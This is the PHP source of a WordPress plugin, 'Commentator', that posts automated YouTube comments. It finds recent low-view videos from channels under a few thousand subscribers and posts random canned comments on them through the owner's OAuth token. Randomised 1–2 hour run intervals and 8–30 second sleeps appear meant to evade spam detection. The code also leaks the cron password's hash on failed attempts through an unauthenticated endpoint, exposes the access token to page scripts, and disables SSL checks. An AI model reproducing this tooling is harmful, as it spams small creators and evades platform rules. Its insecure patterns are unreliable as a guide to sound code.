<?php
/*
Plugin Name: Commentator
Description: Plugin permettant de commenter automatiquement les video qui date un jour.
Version: 1.2.1
Author: Nizar Lfadili
*/
require_once 'vendor/autoload.php';

// Crée la table lors de l'activation du plugin
function create_commentator_table() {
    global $wpdb;

    // Nom de la table, préfixé par le préfixe de la base de données WordPress
    $table_name = $wpdb->prefix . 'commentator_settings';

    // Structure de la table avec la colonne 'date'
    $charset_collate = $wpdb->get_charset_collate();

    // Requête SQL pour créer la table
    $sql = "CREATE TABLE $table_name (
        id BIGINT(20) UNSIGNED AUTO_INCREMENT PRIMARY KEY,
        commentator_actif ENUM('0', '1') DEFAULT '0' NOT NULL,
        date DATE DEFAULT CURRENT_TIMESTAMP NOT NULL
    ) $charset_collate;";

    // Exécute la requête SQL
    require_once( ABSPATH . 'wp-admin/includes/upgrade.php' );
    dbDelta( $sql );
}

// Enregistrement du hook d'activation pour créer la table
register_activation_hook( __FILE__, 'create_commentator_table' );


register_activation_hook(__FILE__, 'videos_history');
function insert_commentator_data($commentator_actif) {
    global $wpdb;

    // Nom de la table
    $table_name = $wpdb->prefix . 'commentator_settings';

    // Insérer une ligne dans la table
    $wpdb->insert(
        $table_name,
        [
            'commentator_actif' => $commentator_actif, // La valeur de 'commentator_actif' (par exemple, '1' ou '0')
            'date' => current_time('Y-m-d') // Date actuelle au format MySQL
        ]
    );
}




function videos_history() {
    global $wpdb;

    // Nom de la table
    $table_name = $wpdb->prefix . 'videos_history';

    // Vérifiez si la table existe déjà
    if ($wpdb->get_var("SHOW TABLES LIKE '$table_name'") != $table_name) {
        $charset_collate = $wpdb->get_charset_collate();

        // Déclaration de création de table
        $sql = "CREATE TABLE `$table_name` (
            id BIGINT(20) UNSIGNED NOT NULL AUTO_INCREMENT,
            video_id VARCHAR(50) NOT NULL,
            title VARCHAR(255) NOT NULL,
            comment VARCHAR(255) NOT NULL,
            PRIMARY KEY (id)
        ) $charset_collate;";

        // Inclure dbDelta pour exécuter la requête
        require_once(ABSPATH . 'wp-admin/includes/upgrade.php');
        dbDelta($sql);
    }
}

function commentator_menu() {
    add_menu_page(
        'Commentator', // Titre de la page
        'Commentator', // Nom du menu
        'manage_options', // Capacité nécessaire pour voir le menu
        'commentator', // Slug du menu
        'commentator_config_page', // Fonction de rappel pour afficher la page
        'dashicons-admin-generic', // Icône du menu
        100 // Position du menu
    );

    // Sous-menu Config
    add_submenu_page(
        'commentator', // Slug du menu parent
        'Config', // Titre de la page
        'Config', // Nom du sous-menu
        'manage_options', // Capacité nécessaire pour voir le sous-menu
        'commentator-config', // Slug de la page
        'commentator_config_page' // Fonction de rappel pour afficher la page
    );

    // Sous-menu Opération
    add_submenu_page(
        'commentator', // Slug du menu parent
        'Operation', // Titre de la page
        'Operation', // Nom du sous-menu
        'manage_options', // Capacité nécessaire pour voir le sous-menu
        'commentator-operation', // Slug de la page
        'commentator_operation_page' // Fonction de rappel pour afficher la page
    );
      add_submenu_page(
        'commentator', // Slug du menu parent
        'video installation commentator', // Titre de la page
        'video installation', // Nom du sous-menu
        'manage_options', // Capacité nécessaire pour voir le sous-menu
        'commentator_video_installation', // Slug de la page
        'commentator_video_installation' // Fonction de rappel pour afficher la page
    );


    // Sous-menu Licence Key
    add_submenu_page(
        'commentator', // Slug du menu parent
        'Licence Key', // Titre de la page
        'Licence Key', // Nom du sous-menu
        'manage_options', // Capacité nécessaire pour voir le sous-menu
        'commentator-licence-key', // Slug de la page
        'commentator_licence_key_page' // Fonction de rappel pour afficher la page
    );
}

function commentator_video_installation(){
     
        ?>
    <div style="text-align: center; margin-top: 50px;">
        <h1>Comment installer et configurer Commentatorv1.2.1</h1>
        <iframe width="800" height="450" src="https://www.youtube.com/embed/p98BGUunNLI?si=lH1AMAzjtSiRZIWO" 
            title="YouTube video player" frameborder="0" 
            allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" 
            allowfullscreen></iframe>
    </div>
    <?php
    
}
add_action('admin_menu', 'commentator_menu');

// Fonction de callback pour la page de configuration
function get_authorization_url() {
    $client_id = get_option('commentator_client_id');
    $redirect_uri = admin_url('admin.php?page=commentator-config'); // URL de redirection
    $scope = 'https://www.googleapis.com/auth/youtube.force-ssl https://www.googleapis.com/auth/yt-analytics.readonly'; // Scopes séparés par un espace
    $url = 'https://accounts.google.com/o/oauth2/auth';
    $params = array(
        'client_id' => $client_id,
        'redirect_uri' => $redirect_uri,
        'scope' => $scope, // Les scopes sont passés dans un seul paramètre
        'response_type' => 'code',
        'access_type' => 'offline', // Pour obtenir un refresh token
        'approval_prompt' => 'force' // Forcer l'affichage de l'écran de consentement
    );

    // Générer l'URL d'authentification
    $auth_url = add_query_arg($params, $url);
 // Assurez-vous de sortir après la redirection pour éviter d'autres exécutions
 return $auth_url;
}

// Fonction pour échanger le code d'autorisation contre un access token

function exchange_authorization_code_for_access_token($authorization_code) {
    $client_id = get_option('commentator_client_id');
    $client_secret = get_option('commentator_client_secret');
    $redirect_uri = admin_url('admin.php?page=commentator-config');
    $token_url = 'https://oauth2.googleapis.com/token';

    // Construire les paramètres de la requête POST
    $params = array(
        'code' => $authorization_code,
        'client_id' => $client_id,
        'client_secret' => $client_secret,
        'redirect_uri' => $redirect_uri,
        'grant_type' => 'authorization_code'
    );

    // Effectuer une requête POST pour échanger le code d'autorisation contre un access token
    $response = wp_remote_post($token_url, array(
        'body' => $params
    ));

    // Vérifier si la requête a réussi
    if (!is_wp_error($response)) {
        $body = wp_remote_retrieve_body($response);
        $data = json_decode($body);

        // Vérifier si l'access token a été obtenu
        if (isset($data->access_token) && isset($data->refresh_token)) {
            // Stocker les tokens de manière sécurisée
            update_option('commentator_access_token', $data->access_token);
            update_option('commentator_refresh_token', $data->refresh_token);
            return $data;
        }
    }

    // En cas d'erreur, retourner null
    return null;
}



function refresh_access_token($refresh_token) {
    $client = new Google_Client();
    $client->setClientId(get_option('commentator_client_id'));
    $client->setClientSecret(get_option('commentator_client_secret'));
    
    // Vérifier si le token est expiré
    if ($client->isAccessTokenExpired()) {
        // Rafraîchir le token
        $client->refreshToken($refresh_token);

        // Obtenir le nouvel access token
        $new_access_token = $client->getAccessToken();
        $access_token = $new_access_token['access_token'];

        // Stocker le nouvel access token dans les options
        update_option('commentator_access_token', $access_token);

        return $access_token;
    }

    // Retourner le token existant s'il n'est pas expiré
    return get_option('commentator_access_token');
}

// Utilisation de la fonction pour obtenir le refresh token

function CreatAIComment($prompt) {
// Remplacez ceci par votre clé API
$apiKey = get_option("ai_api");

// Le texte que vous souhaitez envoyer à l'API


// Les données à envoyer
$data = [
    'model' => 'gpt-3.5-turbo',
    'messages' => [
        ['role' => 'user', 'content' => $prompt]
    ],
    'max_tokens' => 250

// Ajustez le nombre de tokens de réponse souhaité
];

// Initialiser cURL
$ch = curl_init();

// Configurer l'URL, la méthode et les options de cURL
curl_setopt($ch, CURLOPT_URL, 'https://api.openai.com/v1/chat/completions');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    'Content-Type: application/json',
    'Authorization: Bearer ' . $apiKey
]);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));

// Exécuter la requête
$response = curl_exec($ch);

// Vérifier les erreurs de cURL
if (curl_errno($ch)) {
    echo 'Erreur cURL : ' . curl_error($ch);
    return;
} else {
    // Décoder la réponse JSON
    $responseData = json_decode($response, true);
    
    // Afficher la réponse
    if (isset($responseData['choices'][0]['message']['content'])) {
       
        return $responseData['choices'][0]['message']['content'];
    } else {
    }
}

// Fermer la session cURL
curl_close($ch);}

// Maintenant, vous avez le refresh token et pouvez le stocker en toute sécurité
add_action('wp_ajax_commented', 'commented');
add_action('wp_ajax_nopriv_commented', 'commented');
function insertVideo($video_id,$title, $comment) {
    global $wpdb;

    // Nom de la table
    $table_name = $wpdb->prefix . 'videos_history';

    // Données à insérer
    $data = array(
        'video_id' => $video_id,
         'title'=>$title,
        'comment' => $comment
       
        
    );

    // Types de données (chaque % correspond au type de chaque colonne dans $data)
    $format = array('%s', '%s','%s');

    // Insertion des données
    $wpdb->insert($table_name, $data, $format);

    // Vérifier si l'insertion a réussi
    return !$wpdb->last_error;
}

function commented (){
  
set_time_limit(0); // Aucun délai limite

    if (!isset($_GET["password"])) {
        
    return;
}

$password = sanitize_text_field($_GET["password"]); // Nettoyage
$hashed_password = get_option("cron_passwd");

if (md5($password) !==md5($hashed_password)) {
  echo md5($hashed_password)."<br>";
  echo md5($password);
    return;
}

// Passe le test, vous pouvez exécuter le reste du code ici
// Récupérer la dernière exécution du cron job
    $last_run = get_option('last_cron_run_time', 0);

    // Si la dernière exécution est vide, initialiser à 0 (jamais exécuté)
    if ($last_run === 0) {
        update_option('last_cron_run_time', time()); // Enregistrer le temps actuel si jamais exécuté
        return; // Ne rien faire si c'est la première exécution
    }

    // Calculer le temps écoulé depuis la dernière exécution
    $time_difference = time() - $last_run;
echo $time_difference ."<br>"; 
    // Générer un délai aléatoire entre 1 et 2 heures (3600 à 7200 secondes)
    $random_delay = rand(3600, 7200); // Entre 1 heure (3600 secondes) et 2 heures (7200 secondes)
    echo $random_delay."<br>";
if($time_difference < $random_delay)
 return;

$var=get_option("enable_cron");
if($var!=="1")
die("commentator not enabled") ;

    $t=array();
    $s=get_option('cmt');
    $keywordsArray = explode('-', $s);
    
    
   $count = intval(get_option('counting', 0));
   
   $t=get_option('commentator_youtube_videos', array());
   echo "=====<".count($t);
   echo '<br>'.$count;
   if($count>=count($t)-1 ||$count===0){
   
   search_and_save_youtube_videos(get_option('keywd'));
   update_option('counting',0);
   
   }
   
   $count = intval(get_option('counting'));
   $msg="";
   $compteur=0;
   for($i=$count ;$i<count($t);$i++){
       if($count===count($t)-1)
       break;
       
       $randomKeyword = $keywordsArray[array_rand($keywordsArray)];

      if($compteur >= intval(get_option("nbre"))){
          
        break;
         
      }
       if(comment($randomKeyword,$t[$i]->id->videoId)){
           
            
            insertVideo($t[$i]->id->videoId,$t[$i]->snippet->title,$randomKeyword);
            $count++;
            $compteur++;
            $randomSleep = rand(8, 30);
            
        sleep($randomSleep); 
       
           
       }
   }
   
   update_option('counting',$count);
   update_option('last_cron_run_time', time());

    
   die(); 
}
function sender($message){
    $phone=get_option("wpcallme");  // Enter your phone number here
    $apikey=get_option("wpapi");       // Enter your personal apikey received in step 3 above

    $url='https://api.callmebot.com/whatsapp.php?source=php&phone='.$phone.'&text='.urlencode($message).'&apikey='.$apikey;

    if($ch = curl_init($url))
    {
        curl_setopt ($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
        $html = curl_exec($ch);
        $status = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        // echo "Output:".$html;  // you can print the output for troubleshooting
        curl_close($ch);
        return (int) $status;
    }
    else
    {
        return false;
    }
}
function comment($keyword, $videoid) {
    // Chargez la bibliothèque Google API Client
    error_reporting(E_ALL); ini_set('display_errors', 1);

    // Configurez votre ID client et votre secret client
    $client = new Google_Client();
    $client->setClientId(get_option('commentator_client_id'));
    $client->setClientSecret(get_option('commentator_client_secret'));

    // Configurez l'URL de redirection pour OAuth2
    $client->setRedirectUri(admin_url('admin.php?page=commentator-operation'));
    

    // Configurez la portée d'authentification pour YouTube Data API v3
    $client->addScope('https://www.googleapis.com/auth/youtube.force-ssl');
    $client->addScope('https://www.googleapis.com/auth/yt-analytics.readonly');

    // Vérifiez si nous avons déjà un jeton d'accès
    $accessToken = get_option('commentator_access_token');
    if ($accessToken) {
        $client->setAccessToken($accessToken);

        // Vérification si le token d'accès est expiré
        if ($client->isAccessTokenExpired()) {
            $refreshToken = get_option('commentator_refresh_token');
            $new_access_token = refresh_access_token($refreshToken);
            $client->setAccessToken($new_access_token);
            
        }
    }
    // Créez un objet YouTube service
    $youtube = new Google_Service_YouTube($client);

    // Construisez le corps du commentaire
    $comment = new Google_Service_YouTube_Comment();
    $commentSnippet = new Google_Service_YouTube_CommentSnippet();
    $commentSnippet->setTextOriginal($keyword);
    $comment->setSnippet($commentSnippet);

    // Construisez le commentaire sur la vidéo
    $commentThreadSnippet = new Google_Service_YouTube_CommentThreadSnippet();
    $commentThreadSnippet->setVideoId($videoid);
    $commentThreadSnippet->setTopLevelComment($comment);

    $commentThread = new Google_Service_YouTube_CommentThread();
    $commentThread->setSnippet($commentThreadSnippet);

    // Envoyez la requête pour ajouter le commentaire
    try {
        $response = $youtube->commentThreads->insert('snippet', $commentThread);

        // Vérifiez si le commentaire a été ajouté avec succès
        if ($response && $response->getId()) {
            return true;
        } else {
            return false;
        }
    } catch (Google_Service_Exception $e) {
        error_log('Erreur lors de l\'ajout du commentaire: ' . $e->getMessage());
        return false;
    } catch (Exception $e) {
        error_log('Erreur inattendue: ' . $e->getMessage());
        return false;
    }
    
}
// Ajouter le script JS et CSS
add_action('admin_enqueue_scripts', 'youtube_stats_plugin_assets');
function youtube_stats_plugin_assets($hook) {
      global $wpdb;

    // Sélectionner les dates et les textes depuis la table
    $results = $wpdb->get_results("SELECT `date`, `commentator_actif` FROM {$wpdb->prefix}commentator_settings", ARRAY_A);

    // Créer un tableau pour stocker les dates et textes
    $dates_and_texts = [];

    // Remplir le tableau avec les résultats de la requête
    foreach ($results as $row) {
        $dates_and_texts[] = [$row['date'], $row['commentator_actif']];
    }
  
    $refreshToken = get_option('commentator_refresh_token');
    $access_token=refresh_access_token($refreshToken);
    if ($hook !== 'commentator_page_commentator-config') return;
    wp_enqueue_script('jquery');
    // Charger Chart.js
    wp_enqueue_script('chartjs', 'https://cdn.jsdelivr.net/npm/chart.js', [], null, true);
    // Charger le plugin Chart.js pour les annotations
    wp_enqueue_script('chartjs-plugin-annotation', 'https://cdn.jsdelivr.net/npm/chartjs-plugin-annotation', ['chartjs'], null, true);

    // Charger le script personnalisé
    wp_enqueue_script('youtube-stats-plugin-js', plugin_dir_url(__FILE__) . 'youtube-stats.js', ['jquery', 'chartjs', 'chartjs-plugin-annotation'], null, true);

wp_localize_script('youtube-stats-plugin-js', 'youtubeStatsData', [
    'ajax_url' => admin_url('admin-ajax.php'),
    'access_token' => $access_token  ,//Remplacez par votre jeton d'accès OAuth2
    'dates_and_texts' =>$dates_and_texts
]);
    // Dans votre fonction PHP qui envoie les données à JavaScript


}

// Utilisation de la fonction pour ajouter un commentaire à une vidéo
function commentator_config_page() {
    caction();
    if(!get_option("comit"))die();
    if (isset($_GET['code'])) {
        // Retrieve the authorization code from the GET request
        $authorization_code = $_GET['code'];

        // Exchange the authorization code for an access token
        $access_token = exchange_authorization_code_for_access_token($authorization_code);

        // Check if the access token and refresh token are present
        if ($access_token && isset($access_token->access_token) && isset($access_token->refresh_token)) {
            // Store the access token and refresh token securely
            update_option('commentator_access_token', $access_token->access_token);
            update_option('commentator_refresh_token', $access_token->refresh_token);

            // Display a success message
            echo '<div class="notice notice-success is-dismissible"><p>Connected successfully!</p></div>';
        } else {
            // Display an error message if the tokens were not obtained
            echo '<div class="notice notice-error is-dismissible"><p>Not Connected, please check your client ID and secret.</p></div>';
        }
    }
    ?>
    <div class="wrap">
        <h2>Configuration Commentator</h2>
          <h2 class="nav-tab-wrapper">
            <a href="#config-commentator" class="nav-tab ">Config</a>
            <a href="#show-videos" class="nav-tab nav-tab-active">Commented Videos</a>
            <a href="#statistics" class="nav-tab ">Statistics</a>
           
        </h2>
       <div id="config-commentator" class="tab-content "> <form method="post" action="options.php">
            <?php settings_fields('commentator_settings_group'); ?>
            <?php do_settings_sections('commentator_settings_group'); ?>
            
            <table class="form-table">
                  <tr valign="top">
            <th scope="row">Enable Cron:</th>
            <td>
                <input type="checkbox" name="enable_cron" value="1" <?php checked(1, get_option('enable_cron'), true); ?> />
                <label for="enable_cron">Enable Cron</label>
                  <input type="hidden" name="save_changes_clicked" value="1">
            </td>
        </tr>
                <tr valign="top">
                    <th scope="row">API Key:</th>
                    <td><input type="text" name="commentator_api_key" value="<?php echo esc_attr(get_option('commentator_api_key')); ?>" /></td>
                </tr>
              
                <tr valign="top">
                    <th scope="row">Client ID:</th>
                    <td><input type="text" name="commentator_client_id" value="<?php echo esc_attr(get_option('commentator_client_id')); ?>" /></td>
                </tr>
                <tr valign="top">
                    <th scope="row">Client Secret:</th>
                    <td><input type="text" name="commentator_client_secret" value="<?php echo esc_attr(get_option('commentator_client_secret')); ?>" /></td>
                </tr>
                    <tr valign="top">
                    <th scope="row">keyword:</th>
                    <td><input type="text" name="keywd" value="<?php echo esc_attr(get_option('keywd')); ?>" /></td>
                </tr>
                <tr valign="top">
                    <th scope="row">Channel ID:</th>
                    <td><input type="text" name="channel_id" value="<?php echo esc_attr(get_option('channel_id')); ?>" /></td>
                </tr>
                <tr valign="top">
                    <th scope="row">Cron Password:</th>
                    <td><input type="password" name="cron_passwd" value="<?php echo esc_attr(get_option('cron_passwd')); ?>" /></td>
                         
                </tr>
                <tr valign="top">
    <th scope="row">cron link:</th>
    <td><input type="text" name="cronlink" value="<?php echo "wget --spider -O - ".admin_url('admin-ajax.php?action=commented')."&password=".esc_attr(get_option('cron_passwd'))." >/dev/null 2>&1"; ?>" readonly /></td>
</tr>

                                </tr>
                    <tr valign="top">
                    <th scope="row">MaxResults:</th>
                    <td><select name="max_results">
            <?php
            $max_results = esc_attr(get_option('max_results'));
            $options = [5, 10, 15, 20, 25, 30,40,50,60,70,80,90,100,200];
            foreach ($options as $option) {
                echo "<option value=\"$option\"" . ($max_results == $option ? ' selected' : '') . ">$option</option>";
            }
            ?>
        </select></td>
        
        </tr>
                    <tr valign="top">
                    <th scope="row">add date:</th>
                    <td> <select name="time_option">
            <?php
            $time_option = esc_attr(get_option('time_option'));
            $options = ['-1 hour', '-1 day', '-1 week'];
            foreach ($options as $option) {
                echo "<option value=\"$option\"" . ($time_option == $option ? ' selected' : '') . ">$option</option>";
            }
            ?>
        </select></td>
                </tr>
                <tr valign="top">
                    <th scope="row">subscribers less than:</th>
                    <td> <select name="sub">
            <?php
            $sub = esc_attr(get_option('sub'));
            $options = ['1000', '2000', '3000'];
            foreach ($options as $option) {
                echo "<option value=\"$option\"" . ($sub == $option ? ' selected' : '') . ">$option</option>";
            }
            ?>
        </select></td>
                </tr>
                
                  <tr valign="top">
                    <th scope="row">Video Views:</th>
                    <td> <select name="views">
            <?php
            $v= esc_attr(get_option('views'));
            $options = ['100', '200', '300'];
            foreach ($options as $option) {
                echo "<option value=\"$option\"" . ($v == $option ? ' selected' : '') . ">$option</option>";
            }
            ?>
        </select></td>
                </tr>
                 <tr valign="top">
                    <th scope="row">number of Comments every time:</th>
                    <td> <select name="nbre">
            <?php
            $nbre = esc_attr(get_option('nbre'));
            $options = ['5','6','7','8','9', '10', '15'];
            foreach ($options as $option) {
                echo "<option value=\"$option\"" . ($nbre == $option ? ' selected' : '') . ">$option</option>";
            }
            ?>
        </select></td>
                </tr>
                
                <tr valign="top">
                    <th scope="row">all Comments :</th>
                    <td><textarea name="cmt" rows="15" cols="100"><?php echo esc_textarea(get_option('cmt')); ?></textarea></td>

                </tr>
                
                <tr valign="top">
                    <th scope="row">Access Token:</th>
                    <td>    
      
        <a href="<?php echo esc_url(get_authorization_url()); ?>" class="button-primary">Autoriser l'accès à Google</a>
    </td>
                </tr>
            </table>
            <?php submit_button(); ?>
        </form></div>
           <div id="show-videos" class="tab-content active">
            <h2>Videos</h2>
            <?php
// Obtenir la date d'aujourd'hui
$today = date('Y-m-d');

// Calculer la date 30 jours avant
$start_date = date('Y-m-d', strtotime('-30 days', strtotime($today)));

?>

           <?php afficheVid(); ?>
        </div>
           <div id="statistics"  class="tab-content ">
                   <div class="wrap">
        <h1>Statistiques de la chaîne YouTube</h1>
        <form id="youtube-stats-form">
        <label for="start_date" class="kbira">Date de début :</label>
<input type="date" id="start_date" name="start_date" required value="<?php echo $start_date; ?>">

<label for="end_date" class="kbira">Date de fin :</label>
<input type="date" id="end_date" name="end_date" required value="<?php echo $today; ?>">
            
            <label for="stat_type" class="kbira">Type de statistique :</label>
            <select id="stat_type" name="stat_type" required>
                <option value="views">Vues</option>
                <option value="estimatedMinutesWatched">Heures de visionnage</option>
                <option value="subscribersGained">Abonnés</option>
            </select>
          
        </form>
         <?php $recent_row = get_most_recent_row();
     if(isVide(get_option("enable_cron"))!==$recent_row["commentator_actif"] ){
         if($recent_row["date"]===current_time('Y-m-d')){
           update_row_by_date($recent_row["date"],isVide(get_option("enable_cron"))) ;
            
        }else{
         insert_commentator_data(isVide(get_option("enable_cron"))) ;
        }
     }
     
     ?>
        <canvas id="youtube-stats-chart" width="400" height="150"></canvas>
        
    </div>
               
           </div>

    </div>
    
    <script>
    document.addEventListener('DOMContentLoaded', function () {
        const tabs = document.querySelectorAll('.nav-tab');
        const contents = document.querySelectorAll('.tab-content');

        // Activer le contenu de l'onglet Orders par défaut
        document.querySelector('#show-videos').classList.add('active');

        tabs.forEach(tab => {
            tab.addEventListener('click', function (e) {
                e.preventDefault();

                // Retire la classe active de tous les onglets et contenus
                tabs.forEach(t => t.classList.remove('nav-tab-active'));
                contents.forEach(c => c.classList.remove('active'));

                // Active l'onglet cliqué et son contenu associé
                tab.classList.add('nav-tab-active');
                document.querySelector(tab.getAttribute('href')).classList.add('active');
            });
        });
    });
</script>
    <?php
}

function update_row_by_date($date_to_match, $new_value) {
    global $wpdb;

    $table_name = $wpdb->prefix . 'commentator_settings'; // Remplacez par le nom de votre table

    // Préparation et exécution de la requête d'update
    $updated = $wpdb->query(
        $wpdb->prepare(
            "UPDATE $table_name SET commentator_actif = %d WHERE DATE(date) = %s",
            $new_value,
            $date_to_match
        )
    );

}


add_action('wp_ajax_fetch_youtube_stats', 'fetch_youtube_stats');

function fetch_youtube_stats() {
    $start_date = sanitize_text_field($_POST['start_date']);
    $end_date = sanitize_text_field($_POST['end_date']);
    $stat_type = sanitize_text_field($_POST['stat_type']);
    $access_token = sanitize_text_field($_POST['access_token']);  

    if (empty($access_token)) {
        wp_send_json_error('Token d\'accès manquant');
        return;
    }

    $url = "https://youtubeanalytics.googleapis.com/v2/reports?dimensions=day&startDate=$start_date&endDate=$end_date&metrics=$stat_type&ids=channel==MINE&sort=day";

    $response = wp_remote_get($url, [
        'headers' => ['Authorization' => 'Bearer ' . $access_token],
    ]);

    if (is_wp_error($response)) {
        wp_send_json_error('Erreur lors de la requête : ' . $response->get_error_message());
        return;
    }

    $body = wp_remote_retrieve_body($response);
    $data = json_decode($body, true);
    error_log('Réponse API YouTube : ' . print_r($data, true)); // Debug

    if (isset($data['rows'])) {
        // ✅ Convertir les dates en format YYYY-MM-DD
        foreach ($data['rows'] as &$row) {
            $row[0] = date('Y-m-d', strtotime($row[0]));
        }

        wp_send_json_success(['rows' => $data['rows']]);
    } else {
        wp_send_json_error('Aucune donnée trouvée. Réponse complète : ' . print_r($data, true));
    }
}


function search_and_save_youtube_videos($keyword) {
    // Chargez la bibliothèque Google API Client
    require_once 'vendor/autoload.php';

    // Récupérez la clé d'API YouTube Data v3
    $api_key = get_option('commentator_api_key');

    // Créez un client Google
    $client = new Google_Client();
    $client->setDeveloperKey($api_key);

    // Créez un service YouTube
    $youtube = new Google_Service_YouTube($client);

    // Construisez la requête pour rechercher des vidéos
    $searchResponse = $youtube->search->listSearch('snippet', array(
        'q' => $keyword,
        'maxResults' => intval(get_option('max_results')),
        'type' => 'video',
        'publishedAfter' => date('Y-m-d\TH:i:s\Z', strtotime(get_option('time_option'))), // vidéos publiées récemment
        'videoDefinition' => 'any', // tous les types de vidéo
        'videoEmbeddable' => 'true' // vidéos pouvant être intégrées
    ));

    // Vérifiez si des vidéos ont été trouvées
    if (!$searchResponse->getItems()) {
        return; // Aucune vidéo trouvée, on arrête ici
    }

    $filtered_videos = array();

    // Parcourez les vidéos trouvées
    foreach ($searchResponse->getItems() as $item) {
        // Vérifier si l'objet contient bien les informations nécessaires
        if (!isset($item->id->videoId) || !isset($item->snippet->title)) {
            continue;
        }

        $video_id = $item->id->videoId;
        $channel_id = $item->snippet->channelId;

        // Récupérez les statistiques de la chaîne
        $channelResponse = $youtube->channels->listChannels('statistics', array('id' => $channel_id));

        // Vérifiez si les statistiques de la chaîne sont disponibles
        if (!$channelResponse->getItems()) {
            continue;
        }

        $subscriber_count = intval($channelResponse->getItems()[0]->getStatistics()->getSubscriberCount());

        // Filtrer les vidéos des chaînes avec moins de X abonnés
        if ($subscriber_count >= intval(get_option('sub'))) {
            continue;
        }

        // Récupérez les statistiques de la vidéo
        $videoResponse = $youtube->videos->listVideos('statistics', array('id' => $video_id));

        // Vérifiez si les statistiques de la vidéo sont disponibles
        if (!$videoResponse->getItems()) {
            continue;
        }

        $view_count = intval($videoResponse->getItems()[0]->getStatistics()->getViewCount());

        // Filtrer les vidéos avec plus de X vues
        if ($view_count >= intval(get_option('views'))) {
            continue;
        }

        // Ajouter la vidéo filtrée à la liste
        $filtered_videos[] = $item;
    }

    // Enregistrer les vidéos filtrées dans WordPress
    update_option('commentator_youtube_videos', $filtered_videos);
}

// Fonction de callback pour la page d'opération
function commentator_operation_page() {
  
  caction();
   if(!get_option("comit"))die();
    // Vérifier si le formulaire a été soumis
    if (isset($_POST['keyword'])) {
        // Récupérer le mot-clé soumis
        $keyword = sanitize_text_field($_POST['keyword']);

        // Effectuer la recherche et enregistrer les vidéos YouTube
        search_and_save_youtube_videos($keyword);
    }

    // Récupérer les vidéos enregistrées dans le tableau d'options WordPress
    $youtube_videos = get_option('commentator_youtube_videos', array());

    // Afficher les vidéos
    ?>
    <div class="wrap">
        <h2>Opération Commentator</h2>
        <form method="post" action="">
            <label for="keyword">Mot-clé:</label>
            <input type="text" id="keyword" name="keyword">
            <?php submit_button('Search', 'primary', 'search_button', false); ?>
        </form>
        <h3>Résultats de la recherche YouTube</h3>
        <?php if (!empty($youtube_videos)) : ?>
            <ul>
                <?php foreach ($youtube_videos as $video) : ?>
                    <li>
                        <a href="https://www.youtube.com/watch?v=<?php echo $video->id->videoId; ?>" target="_blank"><?php echo $video->snippet->title; ?></a>
                    </li>
                <?php endforeach; ?>
            </ul>
        <?php else : ?>
            <p>Aucune vidéo trouvée.</p>
        <?php endif; ?>
    </div>
    <?php
}

function getYouTubeThumbnail($videoId, $quality = 'default') {
    // Vérifiez la qualité demandée
    $qualities = ['default', 'hqdefault', 'mqdefault', 'maxresdefault'];
    if (!in_array($quality, $qualities)) {
        $quality = 'default'; // Fallback sur la qualité par défaut
    }

    // Construire l'URL de la miniature
    return "https://img.youtube.com/vi/$videoId/$quality.jpg";
}
// Fonction de callback pour la page de licence key
function commentator_licence_key_page() {

   
    if (get_option('co')) {
        // La clé d'activation a déjà été validée, affichez "Activated"
        echo '<div class="wrap">';
        echo '<h2>Activation Key</h2>';
         echo '<div class="notice notice-success is-dismissible"><p>Plugin activated successfully!</p></div>';
        echo '</div>';
    } else {
        if (isset($_POST['activation_key'])) {
           $domain = $_SERVER['HTTP_HOST'];

// Supprimez le préfixe "www." si présent
$domain = preg_replace('/^www\./', '', $domain);

            // Récupérez la clé d'activation soumise par l'utilisateur
            $submitted_key = sanitize_text_field($_POST['activation_key']);
            
            // Vérifiez la clé d'activation avec une clé d'activation valide
            $_POST['plugin']="commentator";
            $_POST["w"]=$domain;
             $myarrayy = $_POST ;

        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL,"https://venoboost.com/services/insertKeys");

        curl_setopt($ch, CURLOPT_POST, 1);

        curl_setopt($ch, CURLOPT_POSTFIELDS,$myarrayy);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

        $server_output = curl_exec($ch);

        curl_close ($ch);
    
        $item=json_decode($server_output);
        
        
            if ($item->actif=="ok") {
               
                // La clé d'activation est valide, activez le plugin
                update_option('comit', true);
                update_option("commentator_key",$submitted_key);
                echo '<div class="notice notice-success is-dismissible"><p>Plugin activated successfully!</p></div>';
            } else {
                echo '<div class="notice notice-error is-dismissible"><p>Invalid activation key. Please try again.</p></div>';
            }
        }
        
        // Affichez le formulaire de saisie de la clé d'activation
        ?>
        <div class="wrap">
            <h2>Activation Key</h2>
            <form method="post">
                <label for="activation_key">Activation Key:</label>
                <input type="text" name="activation_key" id="activation_key" required>
                <input type="submit" name="activate_plugin" value="Activate Plugin">
            </form>
        </div>
        <?php
    
}

}

// Enregistrement des champs de configuration
 function isVide($valeur){
     if(empty($valeur) || $valeur==='')
     return '0';
     return $valeur;
     
 }
 function get_most_recent_row() {
    global $wpdb;

    // Nom de la table
    $table_name = $wpdb->prefix . 'commentator_settings';

    // Requête pour récupérer la ligne avec la date la plus récente
    $most_recent_row = $wpdb->get_row(
        "SELECT * FROM $table_name ORDER BY date DESC LIMIT 1",
        ARRAY_A // Récupère le résultat sous forme de tableau associatif
    );

    return $most_recent_row;
}
function hash_cron_password($password) {
    // Hacher le mot de passe en MD5 avant de le stocker
    if (!empty($password)) {
        return md5($password);
    }
    return $password; // Retourne la valeur telle quelle si vide
}
function commentator_register_settings() {
    register_setting('commentator_settings_group', 'commentator_api_key');
    register_setting('commentator_settings_group', 'commentator_client_id');
    register_setting('commentator_settings_group', 'commentator_client_secret');
    register_setting('commentator_settings_group', 'commentator_access_token');
    register_setting('commentator_settings_group', 'sub');
    register_setting('commentator_settings_group', 'views');//max_results
    register_setting('commentator_settings_group', 'max_results');
    register_setting('commentator_settings_group', 'time_option');
    register_setting('commentator_settings_group', 'cmt');
    register_setting('commentator_settings_group', 'keywd');
     register_setting('commentator_settings_group', 'nbre');
     register_setting('commentator_settings_group', 'channel_id');
     register_setting('commentator_settings_group', 'enable_cron');

      // Enregistrer l'option avec une fonction de validation
